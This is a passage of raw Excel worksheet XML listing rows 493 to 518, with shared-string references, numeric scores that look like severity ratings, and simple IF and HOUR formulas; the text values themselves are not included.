      <c r="U493" s="4"/>
      <c r="V493" s="7"/>
    </row>
    <row r="494" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A494" s="3" t="s">
        <v>2743</v>
      </c>
      <c r="B494" s="4" t="s">
        <v>2744</v>
      </c>
      <c r="C494" s="4" t="s">
        <v>2745</v>
      </c>
      <c r="D494" s="4" t="s">
        <v>2746</v>
      </c>
      <c r="E494" s="4" t="s">
        <v>2747</v>
      </c>
      <c r="F494" s="4" t="s">
        <v>2748</v>
      </c>
      <c r="G494" s="4" t="s">
        <v>2749</v>
      </c>
      <c r="H494" s="4">
        <v>4.7</v>
      </c>
      <c r="I494" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J494" s="4"/>
      <c r="K494" s="4"/>
      <c r="L494" s="4">
        <f>IF(out!$G494="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M494" s="4"/>
      <c r="N494" s="4"/>
      <c r="O494" s="13"/>
      <c r="P494" s="4"/>
      <c r="Q494" s="13">
        <f>HOUR(out!$P494 -out!$N494)</f>
        <v>0</v>
      </c>
      <c r="R494" s="18"/>
      <c r="S494" s="4"/>
      <c r="T494" s="4"/>
      <c r="U494" s="4"/>
      <c r="V494" s="7"/>
    </row>
    <row r="495" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A495" s="3" t="s">
        <v>2750</v>
      </c>
      <c r="B495" s="4" t="s">
        <v>2751</v>
      </c>
      <c r="C495" s="4" t="s">
        <v>2752</v>
      </c>
      <c r="D495" s="4" t="s">
        <v>2753</v>
      </c>
      <c r="E495" s="4" t="s">
        <v>2754</v>
      </c>
      <c r="F495" s="4" t="s">
        <v>2755</v>
      </c>
      <c r="G495" s="4" t="s">
        <v>125</v>
      </c>
      <c r="H495" s="4">
        <v>9.1</v>
      </c>
      <c r="I495" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J495" s="4"/>
      <c r="K495" s="4"/>
      <c r="L495" s="4">
        <f>IF(out!$G495="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M495" s="4"/>
      <c r="N495" s="4"/>
      <c r="O495" s="13"/>
      <c r="P495" s="4"/>
      <c r="Q495" s="13">
        <f>HOUR(out!$P495 -out!$N495)</f>
        <v>0</v>
      </c>
      <c r="R495" s="18"/>
      <c r="S495" s="4"/>
      <c r="T495" s="4"/>
      <c r="U495" s="4"/>
      <c r="V495" s="7"/>
    </row>
    <row r="496" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A496" s="3" t="s">
        <v>2756</v>
      </c>
      <c r="B496" s="4" t="s">
        <v>2757</v>
      </c>
      <c r="C496" s="4" t="s">
        <v>2758</v>
      </c>
      <c r="D496" s="4" t="s">
        <v>2759</v>
      </c>
      <c r="E496" s="4" t="s">
        <v>2760</v>
      </c>
      <c r="F496" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G496" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H496" s="4">
        <v>5.7</v>
      </c>
      <c r="I496" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J496" s="4"/>
      <c r="K496" s="4"/>
      <c r="L496" s="4">
        <f>IF(out!$G496="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M496" s="4"/>
      <c r="N496" s="4"/>
      <c r="O496" s="13"/>
      <c r="P496" s="4"/>
      <c r="Q496" s="13">
        <f>HOUR(out!$P496 -out!$N496)</f>
        <v>0</v>
      </c>
      <c r="R496" s="18"/>
      <c r="S496" s="4"/>
      <c r="T496" s="4"/>
      <c r="U496" s="4"/>
      <c r="V496" s="7"/>
    </row>
    <row r="497" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A497" s="3" t="s">
        <v>2761</v>
      </c>
      <c r="B497" s="4" t="s">
        <v>2762</v>
      </c>
      <c r="C497" s="4" t="s">
        <v>2763</v>
      </c>
      <c r="D497" s="4" t="s">
        <v>1917</v>
      </c>
      <c r="E497" s="4" t="s">
        <v>1918</v>
      </c>
      <c r="F497" s="4" t="s">
        <v>2764</v>
      </c>
      <c r="G497" s="4" t="s">
        <v>630</v>
      </c>
      <c r="H497" s="4">
        <v>4.7</v>
      </c>
      <c r="I497" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J497" s="4"/>
      <c r="K497" s="4"/>
      <c r="L497" s="4">
        <f>IF(out!$G497="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M497" s="4"/>
      <c r="N497" s="4"/>
      <c r="O497" s="13"/>
      <c r="P497" s="4"/>
      <c r="Q497" s="13">
        <f>HOUR(out!$P497 -out!$N497)</f>
        <v>0</v>
      </c>
      <c r="R497" s="18"/>
      <c r="S497" s="4"/>
      <c r="T497" s="4"/>
      <c r="U497" s="4"/>
      <c r="V497" s="7"/>
    </row>
    <row r="498" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A498" s="3" t="s">
        <v>2765</v>
      </c>
      <c r="B498" s="4" t="s">
        <v>2766</v>
      </c>
      <c r="C498" s="4" t="s">
        <v>2767</v>
      </c>
      <c r="D498" s="4" t="s">
        <v>2768</v>
      </c>
      <c r="E498" s="4" t="s">
        <v>2769</v>
      </c>
      <c r="F498" s="4" t="s">
        <v>2770</v>
      </c>
      <c r="G498" s="4" t="s">
        <v>2771</v>
      </c>
      <c r="H498" s="4">
        <v>4.2</v>
      </c>
      <c r="I498" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J498" s="4"/>
      <c r="K498" s="4"/>
      <c r="L498" s="4">
        <f>IF(out!$G498="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M498" s="4"/>
      <c r="N498" s="4"/>
      <c r="O498" s="13"/>
      <c r="P498" s="4"/>
      <c r="Q498" s="13">
        <f>HOUR(out!$P498 -out!$N498)</f>
        <v>0</v>
      </c>
      <c r="R498" s="18"/>
      <c r="S498" s="4"/>
      <c r="T498" s="4"/>
      <c r="U498" s="4"/>
      <c r="V498" s="7"/>
    </row>
    <row r="499" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A499" s="3" t="s">
        <v>2659</v>
      </c>
      <c r="B499" s="4" t="s">
        <v>2772</v>
      </c>
      <c r="C499" s="4" t="s">
        <v>2773</v>
      </c>
      <c r="D499" s="4" t="s">
        <v>2774</v>
      </c>
      <c r="E499" s="4" t="s">
        <v>2775</v>
      </c>
      <c r="F499" s="4" t="s">
        <v>212</v>
      </c>
      <c r="G499" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H499" s="4">
        <v>8.6999999999999993</v>
      </c>
      <c r="I499" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J499" s="4"/>
      <c r="K499" s="4"/>
      <c r="L499" s="4">
        <f>IF(out!$G499="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M499" s="4"/>
      <c r="N499" s="4"/>
      <c r="O499" s="13"/>
      <c r="P499" s="4"/>
      <c r="Q499" s="13">
        <f>HOUR(out!$P499 -out!$N499)</f>
        <v>0</v>
      </c>
      <c r="R499" s="18"/>
      <c r="S499" s="4"/>
      <c r="T499" s="4"/>
      <c r="U499" s="4"/>
      <c r="V499" s="7"/>
    </row>
    <row r="500" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A500" s="3" t="s">
        <v>2776</v>
      </c>
      <c r="B500" s="4" t="s">
        <v>2777</v>
      </c>
      <c r="C500" s="4" t="s">
        <v>2778</v>
      </c>
      <c r="D500" s="4" t="s">
        <v>2779</v>
      </c>
      <c r="E500" s="4" t="s">
        <v>2780</v>
      </c>
      <c r="F500" s="4" t="s">
        <v>2781</v>
      </c>
      <c r="G500" s="4" t="s">
        <v>2782</v>
      </c>
      <c r="H500" s="4">
        <v>7.3</v>
      </c>
      <c r="I500" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J500" s="4"/>
      <c r="K500" s="4"/>
      <c r="L500" s="4">
        <f>IF(out!$G500="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M500" s="4"/>
      <c r="N500" s="4"/>
      <c r="O500" s="13"/>
      <c r="P500" s="4"/>
      <c r="Q500" s="13">
        <f>HOUR(out!$P500 -out!$N500)</f>
        <v>0</v>
      </c>
      <c r="R500" s="18"/>
      <c r="S500" s="4"/>
      <c r="T500" s="4"/>
      <c r="U500" s="4"/>
      <c r="V500" s="7"/>
    </row>
    <row r="501" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A501" s="3" t="s">
        <v>2783</v>
      </c>
      <c r="B501" s="4" t="s">
        <v>2784</v>
      </c>
      <c r="C501" s="4" t="s">
        <v>2785</v>
      </c>
      <c r="D501" s="4" t="s">
        <v>2786</v>
      </c>
      <c r="E501" s="4" t="s">
        <v>2787</v>
      </c>
      <c r="F501" s="4" t="s">
        <v>2788</v>
      </c>
      <c r="G501" s="4" t="s">
        <v>2789</v>
      </c>
      <c r="H501" s="4">
        <v>7.3</v>
      </c>
      <c r="I501" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J501" s="4"/>
      <c r="K501" s="4"/>
      <c r="L501" s="4">
        <f>IF(out!$G501="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M501" s="4"/>
      <c r="N501" s="4"/>
      <c r="O501" s="13"/>
      <c r="P501" s="4"/>
      <c r="Q501" s="13">
        <f>HOUR(out!$P501 -out!$N501)</f>
        <v>0</v>
      </c>
      <c r="R501" s="18"/>
      <c r="S501" s="4"/>
      <c r="T501" s="4"/>
      <c r="U501" s="4"/>
      <c r="V501" s="7"/>
    </row>
    <row r="502" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A502" s="3" t="s">
        <v>2790</v>
      </c>
      <c r="B502" s="4" t="s">
        <v>2791</v>
      </c>
      <c r="C502" s="4" t="s">
        <v>2792</v>
      </c>
      <c r="D502" s="4" t="s">
        <v>2753</v>
      </c>
      <c r="E502" s="4" t="s">
        <v>2754</v>
      </c>
      <c r="F502" s="4" t="s">
        <v>2793</v>
      </c>
      <c r="G502" s="4" t="s">
        <v>2794</v>
      </c>
      <c r="H502" s="4">
        <v>7.3</v>
      </c>
      <c r="I502" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J502" s="4"/>
      <c r="K502" s="4"/>
      <c r="L502" s="4">
        <f>IF(out!$G502="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M502" s="4"/>
      <c r="N502" s="4"/>
      <c r="O502" s="13"/>
      <c r="P502" s="4"/>
      <c r="Q502" s="13">
        <f>HOUR(out!$P502 -out!$N502)</f>
        <v>0</v>
      </c>
      <c r="R502" s="18"/>
      <c r="S502" s="4"/>
      <c r="T502" s="4"/>
      <c r="U502" s="4"/>
      <c r="V502" s="7"/>
    </row>
    <row r="503" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A503" s="3" t="s">
        <v>2795</v>
      </c>
      <c r="B503" s="4" t="s">
        <v>2796</v>
      </c>
      <c r="C503" s="4" t="s">
        <v>2797</v>
      </c>
      <c r="D503" s="4" t="s">
        <v>2798</v>
      </c>
      <c r="E503" s="4" t="s">
        <v>2799</v>
      </c>
      <c r="F503" s="4" t="s">
        <v>2800</v>
      </c>
      <c r="G503" s="4" t="s">
        <v>746</v>
      </c>
      <c r="H503" s="4">
        <v>7.3</v>
      </c>
      <c r="I503" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J503" s="4"/>
      <c r="K503" s="4"/>
      <c r="L503" s="4">
        <f>IF(out!$G503="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M503" s="4"/>
      <c r="N503" s="4"/>
      <c r="O503" s="13"/>
      <c r="P503" s="4"/>
      <c r="Q503" s="13">
        <f>HOUR(out!$P503 -out!$N503)</f>
        <v>0</v>
      </c>
      <c r="R503" s="18"/>
      <c r="S503" s="4"/>
      <c r="T503" s="4"/>
      <c r="U503" s="4"/>
      <c r="V503" s="7"/>
    </row>
    <row r="504" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A504" s="3" t="s">
        <v>2801</v>
      </c>
      <c r="B504" s="4" t="s">
        <v>2802</v>
      </c>
      <c r="C504" s="4" t="s">
        <v>2803</v>
      </c>
      <c r="D504" s="4" t="s">
        <v>2804</v>
      </c>
      <c r="E504" s="4" t="s">
        <v>2805</v>
      </c>
      <c r="F504" s="4" t="s">
        <v>2806</v>
      </c>
      <c r="G504" s="4" t="s">
        <v>2585</v>
      </c>
      <c r="H504" s="4">
        <v>7.3</v>
      </c>
      <c r="I504" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J504" s="4"/>
      <c r="K504" s="4"/>
      <c r="L504" s="4">
        <f>IF(out!$G504="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M504" s="4"/>
      <c r="N504" s="4"/>
      <c r="O504" s="13"/>
      <c r="P504" s="4"/>
      <c r="Q504" s="13">
        <f>HOUR(out!$P504 -out!$N504)</f>
        <v>0</v>
      </c>
      <c r="R504" s="18"/>
      <c r="S504" s="4"/>
      <c r="T504" s="4"/>
      <c r="U504" s="4"/>
      <c r="V504" s="7"/>
    </row>
    <row r="505" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A505" s="3" t="s">
        <v>2807</v>
      </c>
      <c r="B505" s="4" t="s">
        <v>2808</v>
      </c>
      <c r="C505" s="4" t="s">
        <v>2809</v>
      </c>
      <c r="D505" s="4" t="s">
        <v>1470</v>
      </c>
      <c r="E505" s="4" t="s">
        <v>1471</v>
      </c>
      <c r="F505" s="4" t="s">
        <v>2810</v>
      </c>
      <c r="G505" s="4" t="s">
        <v>2811</v>
      </c>
      <c r="H505" s="4">
        <v>7.5</v>
      </c>
      <c r="I505" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J505" s="4"/>
      <c r="K505" s="4"/>
      <c r="L505" s="4">
        <f>IF(out!$G505="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M505" s="4"/>
      <c r="N505" s="4"/>
      <c r="O505" s="13"/>
      <c r="P505" s="4"/>
      <c r="Q505" s="13">
        <f>HOUR(out!$P505 -out!$N505)</f>
        <v>0</v>
      </c>
      <c r="R505" s="18"/>
      <c r="S505" s="4"/>
      <c r="T505" s="4"/>
      <c r="U505" s="4"/>
      <c r="V505" s="7"/>
    </row>
    <row r="506" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A506" s="3" t="s">
        <v>2812</v>
      </c>
      <c r="B506" s="4" t="s">
        <v>2813</v>
      </c>
      <c r="C506" s="4" t="s">
        <v>2814</v>
      </c>
      <c r="D506" s="4" t="s">
        <v>2815</v>
      </c>
      <c r="E506" s="4" t="s">
        <v>2816</v>
      </c>
      <c r="F506" s="4" t="s">
        <v>2817</v>
      </c>
      <c r="G506" s="4" t="s">
        <v>2818</v>
      </c>
      <c r="H506" s="4">
        <v>7.3</v>
      </c>
      <c r="I506" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J506" s="4"/>
      <c r="K506" s="4"/>
      <c r="L506" s="4">
        <f>IF(out!$G506="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M506" s="4"/>
      <c r="N506" s="4"/>
      <c r="O506" s="13"/>
      <c r="P506" s="4"/>
      <c r="Q506" s="13">
        <f>HOUR(out!$P506 -out!$N506)</f>
        <v>0</v>
      </c>
      <c r="R506" s="18"/>
      <c r="S506" s="4"/>
      <c r="T506" s="4"/>
      <c r="U506" s="4"/>
      <c r="V506" s="7"/>
    </row>
    <row r="507" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A507" s="3" t="s">
        <v>2819</v>
      </c>
      <c r="B507" s="4" t="s">
        <v>2820</v>
      </c>
      <c r="C507" s="4" t="s">
        <v>2821</v>
      </c>
      <c r="D507" s="4" t="s">
        <v>2753</v>
      </c>
      <c r="E507" s="4" t="s">
        <v>2754</v>
      </c>
      <c r="F507" s="4" t="s">
        <v>2822</v>
      </c>
      <c r="G507" s="4" t="s">
        <v>2823</v>
      </c>
      <c r="H507" s="4">
        <v>9.1</v>
      </c>
      <c r="I507" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J507" s="4"/>
      <c r="K507" s="4"/>
      <c r="L507" s="4">
        <f>IF(out!$G507="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M507" s="4"/>
      <c r="N507" s="4"/>
      <c r="O507" s="13"/>
      <c r="P507" s="4"/>
      <c r="Q507" s="13">
        <f>HOUR(out!$P507 -out!$N507)</f>
        <v>0</v>
      </c>
      <c r="R507" s="18"/>
      <c r="S507" s="4"/>
      <c r="T507" s="4"/>
      <c r="U507" s="4"/>
      <c r="V507" s="7"/>
    </row>
    <row r="508" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A508" s="3" t="s">
        <v>2824</v>
      </c>
      <c r="B508" s="4" t="s">
        <v>2825</v>
      </c>
      <c r="C508" s="4" t="s">
        <v>2826</v>
      </c>
      <c r="D508" s="4" t="s">
        <v>2827</v>
      </c>
      <c r="E508" s="4" t="s">
        <v>2828</v>
      </c>
      <c r="F508" s="4" t="s">
        <v>2829</v>
      </c>
      <c r="G508" s="4" t="s">
        <v>2830</v>
      </c>
      <c r="H508" s="4">
        <v>8.1</v>
      </c>
      <c r="I508" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J508" s="4"/>
      <c r="K508" s="4"/>
      <c r="L508" s="4">
        <f>IF(out!$G508="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M508" s="4"/>
      <c r="N508" s="4"/>
      <c r="O508" s="13"/>
      <c r="P508" s="4"/>
      <c r="Q508" s="13">
        <f>HOUR(out!$P508 -out!$N508)</f>
        <v>0</v>
      </c>
      <c r="R508" s="18"/>
      <c r="S508" s="4"/>
      <c r="T508" s="4"/>
      <c r="U508" s="4"/>
      <c r="V508" s="7"/>
    </row>
    <row r="509" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A509" s="3" t="s">
        <v>2831</v>
      </c>
      <c r="B509" s="4" t="s">
        <v>2832</v>
      </c>
      <c r="C509" s="4" t="s">
        <v>2833</v>
      </c>
      <c r="D509" s="4" t="s">
        <v>2834</v>
      </c>
      <c r="E509" s="4" t="s">
        <v>2835</v>
      </c>
      <c r="F509" s="4" t="s">
        <v>2836</v>
      </c>
      <c r="G509" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H509" s="4">
        <v>7.3</v>
      </c>
      <c r="I509" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J509" s="4"/>
      <c r="K509" s="4"/>
      <c r="L509" s="4">
        <f>IF(out!$G509="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M509" s="4"/>
      <c r="N509" s="4"/>
      <c r="O509" s="13"/>
      <c r="P509" s="4"/>
      <c r="Q509" s="13">
        <f>HOUR(out!$P509 -out!$N509)</f>
        <v>0</v>
      </c>
      <c r="R509" s="18"/>
      <c r="S509" s="4"/>
      <c r="T509" s="4"/>
      <c r="U509" s="4"/>
      <c r="V509" s="7"/>
    </row>
    <row r="510" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A510" s="3" t="s">
        <v>2837</v>
      </c>
      <c r="B510" s="4" t="s">
        <v>2838</v>
      </c>
      <c r="C510" s="4" t="s">
        <v>2839</v>
      </c>
      <c r="D510" s="4" t="s">
        <v>2753</v>
      </c>
      <c r="E510" s="4" t="s">
        <v>2754</v>
      </c>
      <c r="F510" s="4" t="s">
        <v>2793</v>
      </c>
      <c r="G510" s="4" t="s">
        <v>2794</v>
      </c>
      <c r="H510" s="4">
        <v>9.1</v>
      </c>
      <c r="I510" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J510" s="4"/>
      <c r="K510" s="4"/>
      <c r="L510" s="4">
        <f>IF(out!$G510="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M510" s="4"/>
      <c r="N510" s="4"/>
      <c r="O510" s="13"/>
      <c r="P510" s="4"/>
      <c r="Q510" s="13">
        <f>HOUR(out!$P510 -out!$N510)</f>
        <v>0</v>
      </c>
      <c r="R510" s="18"/>
      <c r="S510" s="4"/>
      <c r="T510" s="4"/>
      <c r="U510" s="4"/>
      <c r="V510" s="7"/>
    </row>
    <row r="511" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A511" s="3" t="s">
        <v>2840</v>
      </c>
      <c r="B511" s="4" t="s">
        <v>2841</v>
      </c>
      <c r="C511" s="4" t="s">
        <v>2842</v>
      </c>
      <c r="D511" s="4" t="s">
        <v>2655</v>
      </c>
      <c r="E511" s="4" t="s">
        <v>2656</v>
      </c>
      <c r="F511" s="4" t="s">
        <v>2843</v>
      </c>
      <c r="G511" s="4" t="s">
        <v>2844</v>
      </c>
      <c r="H511" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I511" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J511" s="4"/>
      <c r="K511" s="4"/>
      <c r="L511" s="4">
        <f>IF(out!$G511="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M511" s="4"/>
      <c r="N511" s="4"/>
      <c r="O511" s="13"/>
      <c r="P511" s="4"/>
      <c r="Q511" s="13">
        <f>HOUR(out!$P511 -out!$N511)</f>
        <v>0</v>
      </c>
      <c r="R511" s="18"/>
      <c r="S511" s="4"/>
      <c r="T511" s="4"/>
      <c r="U511" s="4"/>
      <c r="V511" s="7"/>
    </row>
    <row r="512" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A512" s="3" t="s">
        <v>2845</v>
      </c>
      <c r="B512" s="4" t="s">
        <v>2846</v>
      </c>
      <c r="C512" s="4" t="s">
        <v>2847</v>
      </c>
      <c r="D512" s="4" t="s">
        <v>2848</v>
      </c>
      <c r="E512" s="4" t="s">
        <v>2849</v>
      </c>
      <c r="F512" s="4" t="s">
        <v>2850</v>
      </c>
      <c r="G512" s="4" t="s">
        <v>2851</v>
      </c>
      <c r="H512" s="4">
        <v>5.3</v>
      </c>
      <c r="I512" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J512" s="4"/>
      <c r="K512" s="4"/>
      <c r="L512" s="4">
        <f>IF(out!$G512="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M512" s="4"/>
      <c r="N512" s="4"/>
      <c r="O512" s="13"/>
      <c r="P512" s="4"/>
      <c r="Q512" s="13">
        <f>HOUR(out!$P512 -out!$N512)</f>
        <v>0</v>
      </c>
      <c r="R512" s="18"/>
      <c r="S512" s="4"/>
      <c r="T512" s="4"/>
      <c r="U512" s="4"/>
      <c r="V512" s="7"/>
    </row>
    <row r="513" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A513" s="3" t="s">
        <v>2852</v>
      </c>
      <c r="B513" s="4" t="s">
        <v>2853</v>
      </c>
      <c r="C513" s="4" t="s">
        <v>2854</v>
      </c>
      <c r="D513" s="4" t="s">
        <v>961</v>
      </c>
      <c r="E513" s="4" t="s">
        <v>962</v>
      </c>
      <c r="F513" s="4" t="s">
        <v>2855</v>
      </c>
      <c r="G513" s="4" t="s">
        <v>2856</v>
      </c>
      <c r="H513" s="4">
        <v>7.5</v>
      </c>
      <c r="I513" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J513" s="4"/>
      <c r="K513" s="4"/>
      <c r="L513" s="4">
        <f>IF(out!$G513="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M513" s="4"/>
      <c r="N513" s="4"/>
      <c r="O513" s="13"/>
      <c r="P513" s="4"/>
      <c r="Q513" s="13">
        <f>HOUR(out!$P513 -out!$N513)</f>
        <v>0</v>
      </c>
      <c r="R513" s="18"/>
      <c r="S513" s="4"/>
      <c r="T513" s="4"/>
      <c r="U513" s="4"/>
      <c r="V513" s="7"/>
    </row>
    <row r="514" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A514" s="3" t="s">
        <v>2857</v>
      </c>
      <c r="B514" s="4" t="s">
        <v>2858</v>
      </c>
      <c r="C514" s="4" t="s">
        <v>2859</v>
      </c>
      <c r="D514" s="4" t="s">
        <v>2860</v>
      </c>
      <c r="E514" s="4" t="s">
        <v>2861</v>
      </c>
      <c r="F514" s="4" t="s">
        <v>2862</v>
      </c>
      <c r="G514" s="4" t="s">
        <v>2863</v>
      </c>
      <c r="H514" s="4">
        <v>8.4</v>
      </c>
      <c r="I514" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J514" s="4"/>
      <c r="K514" s="4"/>
      <c r="L514" s="4">
        <f>IF(out!$G514="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M514" s="4"/>
      <c r="N514" s="4"/>
      <c r="O514" s="13"/>
      <c r="P514" s="4"/>
      <c r="Q514" s="13">
        <f>HOUR(out!$P514 -out!$N514)</f>
        <v>0</v>
      </c>
      <c r="R514" s="18"/>
      <c r="S514" s="4"/>
      <c r="T514" s="4"/>
      <c r="U514" s="4"/>
      <c r="V514" s="7"/>
    </row>
    <row r="515" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A515" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B515" s="4" t="s">
        <v>2864</v>
      </c>
      <c r="C515" s="4" t="s">
        <v>2865</v>
      </c>
      <c r="D515" s="4" t="s">
        <v>2866</v>
      </c>
      <c r="E515" s="4" t="s">
        <v>2867</v>
      </c>
      <c r="F515" s="4" t="s">
        <v>2868</v>
      </c>
      <c r="G515" s="4" t="s">
        <v>2851</v>
      </c>
      <c r="H515" s="4">
        <v>7.5</v>
      </c>
      <c r="I515" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J515" s="4"/>
      <c r="K515" s="4"/>
      <c r="L515" s="4">
        <f>IF(out!$G515="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M515" s="4"/>
      <c r="N515" s="4"/>
      <c r="O515" s="13"/>
      <c r="P515" s="4"/>
      <c r="Q515" s="13">
        <f>HOUR(out!$P515 -out!$N515)</f>
        <v>0</v>
      </c>
      <c r="R515" s="18"/>
      <c r="S515" s="4"/>
      <c r="T515" s="4"/>
      <c r="U515" s="4"/>
      <c r="V515" s="7"/>
    </row>
    <row r="516" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A516" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B516" s="4" t="s">
        <v>2869</v>
      </c>
      <c r="C516" s="4" t="s">
        <v>2870</v>
      </c>
      <c r="D516" s="4" t="s">
        <v>2871</v>
      </c>
      <c r="E516" s="4" t="s">
        <v>2872</v>
      </c>
      <c r="F516" s="4" t="s">
        <v>2873</v>
      </c>
      <c r="G516" s="4" t="s">
        <v>2874</v>
      </c>
      <c r="H516" s="4">
        <v>7.5</v>
      </c>
      <c r="I516" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J516" s="4"/>
      <c r="K516" s="4"/>
      <c r="L516" s="4">
        <f>IF(out!$G516="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M516" s="4"/>
      <c r="N516" s="4"/>
      <c r="O516" s="13"/>
      <c r="P516" s="4"/>
      <c r="Q516" s="13">
        <f>HOUR(out!$P516 -out!$N516)</f>
        <v>0</v>
      </c>
      <c r="R516" s="18"/>
      <c r="S516" s="4"/>
      <c r="T516" s="4"/>
      <c r="U516" s="4"/>
      <c r="V516" s="7"/>
    </row>
    <row r="517" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A517" s="3" t="s">
        <v>2875</v>
      </c>
      <c r="B517" s="4" t="s">
        <v>2876</v>
      </c>
      <c r="C517" s="4" t="s">
        <v>2877</v>
      </c>
      <c r="D517" s="4" t="s">
        <v>2878</v>
      </c>
      <c r="E517" s="4" t="s">
        <v>2879</v>
      </c>
      <c r="F517" s="4" t="s">
        <v>1539</v>
      </c>
      <c r="G517" s="4" t="s">
        <v>2013</v>
      </c>
      <c r="H517" s="4">
        <v>1.9</v>
      </c>
      <c r="I517" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J517" s="4"/>
      <c r="K517" s="4"/>
      <c r="L517" s="4">
        <f>IF(out!$G517="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M517" s="4"/>
      <c r="N517" s="4"/>
      <c r="O517" s="13"/>
      <c r="P517" s="4"/>
      <c r="Q517" s="13">
        <f>HOUR(out!$P517 -out!$N517)</f>
        <v>0</v>
      </c>
      <c r="R517" s="18"/>
      <c r="S517" s="4"/>
      <c r="T517" s="4"/>
      <c r="U517" s="4"/>
      <c r="V517" s="7"/>
    </row>
    <row r="518" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A518" s="3" t="s">
        <v>1902</v>
      </c>
      <c r="B518" s="4" t="s">
        <v>2880</v>
      </c>
      <c r="C518" s="4" t="s">
        <v>2881</v>
      </c>
      <c r="D518" s="4" t="s">
        <v>2882</v>
      </c>
      <c r="E518" s="4" t="s">
        <v>2883</v>
      </c>
      <c r="F518" s="4" t="s">
        <v>2884</v>
      </c>
      <c r="G518" s="4" t="s">
        <v>2885</v>
      </c>
      <c r="H518" s="4">
        <v>6.5</v>
      </c>
      <c r="I518" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J518" s="4"/>
      <c r="K518" s="4"/>
      <c r="L518" s="4">
        <f>IF(out!$G518="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M518" s="4"/>
      <c r="N518" s="4"/>
      <c r="O518" s="13"/>
      <c r="P518" s="4"/>
      <c r="Q518" s="13">
        <f>HOUR(out!$P518 -out!$N518)</f>
        <v>0</v>
      </c>
      <c r="R518" s="18"/>
      <c r="S518" s="4"/>
      <c r="T518" s="4"/>
